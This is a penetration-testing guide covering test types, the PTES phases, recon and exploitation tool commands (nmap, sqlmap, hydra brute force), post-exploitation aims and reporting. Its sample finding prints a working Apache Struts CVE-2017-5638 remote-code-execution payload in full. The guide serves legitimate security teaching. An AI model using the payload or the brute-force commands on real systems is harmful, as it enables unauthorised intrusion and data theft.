Penetration Testing

Penetration testing (pen testing) is the authorised, simulated attack on a system to evaluate its security. Unlike vulnerability scanning (automated, broad), pen testing is manual, deep, and focused on demonstrating business impact.

Testing Types

By Knowledge Level

| Type | Knowledge Given | Simulates | Depth | Best For |
|---|---|---|---|---|
| Black box | Nothing (just a domain name or IP range) | External attacker with no inside knowledge | Low-Medium | External perimeter testing |
| Grey box | Limited credentials, architecture docs | Compromised insider or contractor | Medium-High | Internal network, web app testing |
| White box | Full access: source code, credentials, architecture, configs | Internal audit, developer review | Highest | Code review, cryptography review, complex logic |

By Target

| Target | Focus | Typical Duration | Typical Cost |
|---|---|---|---|
| External network | Perimeter defences, exposed services | 1-2 weeks | $10k-$30k |
| Internal network | Lateral movement, privilege escalation | 1-2 weeks | $15k-$40k |
| Web application | OWASP Top 10, business logic flaws | 2-4 weeks | $20k-$60k |
| Mobile app | API security, local storage, reverse engineering | 1-3 weeks | $15k-$50k |
| Cloud | IAM misconfigurations, data exposure | 1-2 weeks | $15k-$30k |
| Physical | Physical access controls, tailgating | 1-5 days | $5k-$20k |
| Social engineering | Phishing, pretexting, vishing | 1-2 weeks | $10k-$20k |

Penetration Testing Execution Standard (PTES)

PTES defines seven phases of a penetration test:

Phase 1: Pre-engagement Interactions

Everything before testing begins:

SCOPE AGREEMENT:
- Target IPs/domains: 203.0.113.0/24, *.example.com
- In-scope systems: Production web servers, API endpoints
- Out-of-scope: Database servers, backup systems, SCADA
- Testing window: 9 PM - 5 AM (maintenance window)
- Excluded attacks: DDoS, physical destruction, social engineering of support staff
RULES OF ENGAGEMENT:
- No destructive actions without prior approval
- No exfiltration of real customer data (use synthetic data markers)
- Provide emergency contact numbers (in case of accidental service disruption)
- Third-party notification: will we notify cloud providers? (AWS, Azure)

Phase 2: Intelligence Gathering (Reconnaissance)

Passive and active information gathering:

```bash
# Passive reconnaissance
whois example.com
dig any example.com
dig mx example.com
dig ns example.com
# Subdomain enumeration
sublist3r -d example.com
amass enum -d example.com
# Technology fingerprinting
whatweb example.com
wappalyzer https://example.com
# Shodan search
shodan search hostname:example.com
shodan search org:"Example Corp"
# Certificate transparency
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value'
```
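As an added example (not tooling from the page), the following Python ties the Phase 1 scope agreement to the certificate-transparency output from Phase 2: it dedupes crt.sh `name_value` entries and keeps only hosts the rules of engagement cover, so nothing outside the signed scope reaches active testing. The crt.sh response is constructed, and the two excluded hostnames are assumptions, since the page names none.

```python
# Added example (not tooling from the page): a scope gate that takes hostnames
# harvested in Phase 2 and passes on only those covered by the Phase 1 agreement.
import ipaddress
import json

# Scope values are the page's sample agreement; the excluded hostnames are assumed.
IN_SCOPE = ["203.0.113.0/24", "*.example.com"]
OUT_OF_SCOPE = {"db01.example.com", "backup.example.com"}

def in_scope(target: str) -> bool:
    """True if target matches an in-scope rule and is not explicitly excluded."""
    target = target.lower()
    if target in OUT_OF_SCOPE:
        return False
    for rule in IN_SCOPE:
        if rule.startswith("*."):
            # Assumed reading of the wildcard: any subdomain plus the apex itself.
            if target == rule[2:] or target.endswith(rule[1:]):
                return True
        elif "/" in rule:
            try:
                if ipaddress.ip_address(target) in ipaddress.ip_network(rule):
                    return True
            except ValueError:  # not an IP literal; try the next rule
                continue
        elif target == rule:
            return True
    return False

def hosts_from_crtsh(raw_json: str) -> list[str]:
    """Dedupe crt.sh name_value entries (newline-separated names, '*.' wildcards)."""
    names = set()
    for entry in json.loads(raw_json):
        for name in entry["name_value"].split("\n"):
            name = name.strip().lower().removeprefix("*.")
            if name:
                names.add(name)
    return sorted(names)

def targets_for_testing(raw_json: str) -> list[str]:
    """Hosts from the CT log that the rules of engagement allow us to touch."""
    return [host for host in hosts_from_crtsh(raw_json) if in_scope(host)]

# Constructed stand-in for a crt.sh JSON response (not a real query result).
SAMPLE_CRTSH = json.dumps([
    {"name_value": "www.example.com\nexample.com"}, {"name_value": "*.example.com"},
    {"name_value": "db01.example.com"}, {"name_value": "example-partner.net"},
])
```

Note that `evil-example.com` is rejected: the wildcard match is anchored on the `.example.com` suffix, not on the substring `example.com`.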

Phase 3: Threat Modelling

Identify what matters most and what attacks are most likely:

| Asset | Threat | Attack Vector | Likelihood | Impact |
|---|---|---|---|---|
| Customer database | Data theft | SQL injection, compromised credentials | Medium | Critical |
| Payment system | Fraud | API abuse, MITM | Low | Critical |
| Admin panel | Full compromise | Weak authentication, session hijacking | Medium | Critical |
| Public website | Defacement | Unpatched CMS, XSS | High | Low |

Phase 4: Vulnerability Analysis

Automated scanning combined with manual verification:

```bash
# Network scanning
nmap -sV -sC -p- -oA nmap_scan 203.0.113.0/24
# Web application scanning (automated + manual)
# zap-cli's -l takes an alert level, not a URL; the target is a positional argument
zap-cli quick-scan --spider https://example.com
nikto -h https://example.com
# Manual verification: for each automated finding
# - Confirm false positive / true positive
# - Determine if the finding is exploitable
# - Assess the business impact of exploitation
```

Phase 5: Exploitation

Attempt to exploit vulnerabilities to demonstrate impact:

```bash
# SQL injection demonstration
sqlmap -u "https://example.com/page?id=1" --batch --banner
# Attempt privilege escalation
# Linux: kernel exploits, sudo misconfigurations, SUID binaries
# Windows: unquoted service paths, vulnerable drivers, token manipulation
# Password guessing against one account (spraying is the reverse: one password across many users)
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100
# Lateral movement
# CrackMapExec, Mimikatz, BloodHound, PowerShell remoting
```

Phase 6: Post-Exploitation

After gaining access, demonstrate the maximum business impact:

```bash
# What can we access from this position?
# Enumerate network shares, databases, cloud consoles
# Can we pivot to more critical systems?
# BloodHound: find privilege escalation paths in Active Directory
# What data can we exfiltrate?
# Locate and access PII, financial data, intellectual property
# Can we achieve persistence?
# Backdoor accounts, SSH keys, scheduled tasks
```

Phase 7: Reporting

The report is the only deliverable the client receives. A poor report undermines the entire test:

EXECUTIVE SUMMARY (1-2 pages):
- High-level overview for non-technical leadership
- Key findings in business context
- Risk rating and remediation priority
- No technical jargon
TECHNICAL REPORT:
- Finding details with CVSS scores
- Step-by-step reproduction instructions
- Screenshots of each finding
- Proof-of-concept code (if applicable)
- Remediation guidance
APPENDICES:
- Scope and rules of engagement
- Tools used
- Raw scan data
- Excluded findings (false positives, out-of-scope)

Sample Finding

Finding #1: Remote Code Execution via Unpatched Apache Struts (CVE-2017-5638)
Severity: Critical (CVSS 10.0)
Asset: https://example.com (203.0.113.50)
Description:
The Apache Struts framework on the target server is running version
2.3.32 which is vulnerable to CVE-2017-5638. This vulnerability allows
unauthenticated remote code execution through specially crafted
Content-Type headers.
Reproduction:
1. Navigate to https://example.com/login.action
2. Intercept the request with Burp Suite
3. Send the following request:
GET /login.action HTTP/1.1
Host: example.com
Content-Type: %{(#_='multi_part_name').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.
ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.
ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.
getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').
(#cmds=@java.lang.Runtime@getRuntime().exec(#cmd)).(#iswin=@java.lang.System@
getProperty('os.name').toLowerCase().contains('win')).(#cmds=(#iswin?{'cmd.exe','/c',
#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.
redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.
ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.
io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
4. The response contains: uid=0(root) gid=0(root) groups=0(root)
Impact:
Full remote code execution as root on the production web server.
An attacker could install a webshell, pivot to internal networks,
access the customer database, and exfiltrate PII.
Remediation:
Upgrade Apache Struts to version 2.5.12 or later immediately.
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

OWASP Testing Guide

The OWASP Web Security Testing Guide (WSTG) provides a comprehensive framework for web application testing:

| Module | Tests | Business Risk |
|---|---|---|
| Information Gathering | Search engine discovery, fingerprinting, robots.txt review | Exposure of sensitive information |
| Authentication Testing | Credential transport, enumeration, brute force, weak password policy | Account takeover |
| Session Management Testing | Cookie attributes, session fixation, CSRF | Session hijacking |
| Authorisation Testing | Path traversal, privilege escalation, IDOR | Unauthorised data access |
| Input Validation Testing | SQL injection, XSS, command injection, file upload | Data breach, RCE |
| Business Logic Testing | Workflow bypass, race conditions, excessive data exposure | Financial fraud |

When to Pen Test vs Vulnerability Scan

| Factor | Vulnerability Scan | Penetration Test |
|---|---|---|
| Frequency | Weekly to monthly | Annually or per major change |
| Cost | Low ($1k-$5k/year) | High ($10k-$100k+) |
| Coverage | Broad (all known CVEs) | Deep (specific attack paths) |
| False positives | Higher | Lower (manual verification) |
| Business impact | Shows WHAT is vulnerable | Shows SO WHAT if exploited |
| Regulatory requirement | PCI DSS, HIPAA (quarterly) | PCI DSS (annual), SOC 2 |

Tip

Run vulnerability scans monthly. Run penetration tests annually. But never run a pen test without first having run a vulnerability scan — you waste the pen tester’s time (and your money) asking them to find CVEs an automated scanner would have found for $50.

Key Takeaways

  • Penetration testing is manual, deep, and focused on demonstrating business impact — it complements but does not replace vulnerability scanning
  • PTES defines seven phases from pre-engagement to reporting — follow a standardised methodology for consistency and defensibility
  • Test types (black, grey, white box) offer different trade-offs between realism and depth — choose based on your specific threat model
  • The report is the only deliverable — invest as much in clear, actionable reporting as in technical exploitation
  • Vulnerability scans are for frequency (monthly); pen tests are for depth (annually) — run both as part of a comprehensive program